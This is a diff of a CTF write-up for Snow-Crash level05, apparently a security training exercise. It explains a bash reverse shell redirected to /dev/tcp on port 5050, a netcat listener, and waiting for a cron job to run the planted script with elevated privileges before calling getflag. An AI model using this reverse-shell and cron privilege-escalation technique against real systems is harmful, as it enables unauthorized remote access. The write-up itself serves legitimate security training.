rbulanad/Snow-Crash/level05/resources/solve.md

 	- `>& /dev/tcp/0.0.0.0/5050` == redirects all outputs to a TCP connection<br>
 	- `0>&1` == redirects stdin to stdout, important to be able to input commands AND bypass ulimit -t 5<br>

-8. SSH connect to VM with another terminal, netcat on specified port
+8. SSH connect to VM with another terminal, netcat on specified port (5050 in this case)

-9.	wait for cron schedule to execute and open a reverse shell
+9.	wait for cron schedule to execute and open a reverse shell (MUST WAIT FOR CRON SCHEDULE TO EXECUTE OUR SCRIPT TO HAVE PRIVILEGES INSIDE REVERSE SHELL)

 10.	use getflag inside the reverse shell